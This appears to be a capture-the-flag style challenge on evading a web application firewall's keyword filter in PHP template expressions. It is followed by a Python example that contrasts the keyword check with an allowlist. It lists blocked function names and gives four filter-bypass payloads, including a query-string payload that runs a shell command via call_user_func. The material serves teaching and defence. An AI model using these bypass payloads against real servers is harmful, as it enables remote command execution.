A WAF blocks dangerous keywords in template expressions. Can you bypass it?
Blocked: system, exec, passthru, shell_exec, popen, proc_open, eval
The filter checks for whole keyword strings. Bypass techniques:
1. String concatenation: 'sys'.'tem' → system
2. Variable functions: $f='sys'.'tem'; $f('id')
3. Indirect call: call_user_func('sys'.'tem', 'id')
4. Encoded name: base64_decode('c3lzdGVt')('id') (base64 of "system")
Example payload: ?name=call_user_func('sys'.'tem','id')
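
Why the keyword filter fails and what replaces it, as an added example that is not part of the original challenge: the WAF is modelled as a case-insensitive substring check, and `name` is assumed to be a short display name that is never evaluated. `NAME_RE` and the function names are hypothetical.

```python
import re

# Keyword list copied from the challenge text.
BLOCKED = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open", "eval")

# The four bypass expressions listed in the challenge, used here as test input.
PAGE_PAYLOADS = [
    "'sys'.'tem'",
    "$f='sys'.'tem'; $f('id')",
    "call_user_func('sys'.'tem', 'id')",
    "base64_decode('c3lzdGVt')('id')",
]

# Assumption: `name` is a short display name, so its expected shape is known.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9 _-]{0,63}")


def keyword_filter_allows(value: str) -> bool:
    """Model of the challenge WAF: reject only when a whole keyword appears."""
    lowered = value.lower()
    return not any(word in lowered for word in BLOCKED)


def allowlist_allows(value: str) -> bool:
    """Accept only values that match the expected shape of the field."""
    return NAME_RE.fullmatch(value) is not None


def compare(values):
    """Return (value, keyword_filter_verdict, allowlist_verdict) per input."""
    return [(v, keyword_filter_allows(v), allowlist_allows(v)) for v in values]


if __name__ == "__main__":
    # Constructed extra samples: one direct call and one benign value.
    samples = PAGE_PAYLOADS + ["system('id')", "Alice Smith"]
    for value, kw_ok, al_ok in compare(samples):
        print(f"{value!r:40} "
              f"keyword_filter={'pass' if kw_ok else 'block'} "
              f"allowlist={'pass' if al_ok else 'block'}")
```

Every expression from the list above passes the keyword check because the blocked name only exists after the interpreter evaluates it; the allowlist rejects them on shape alone, without needing to know any function names.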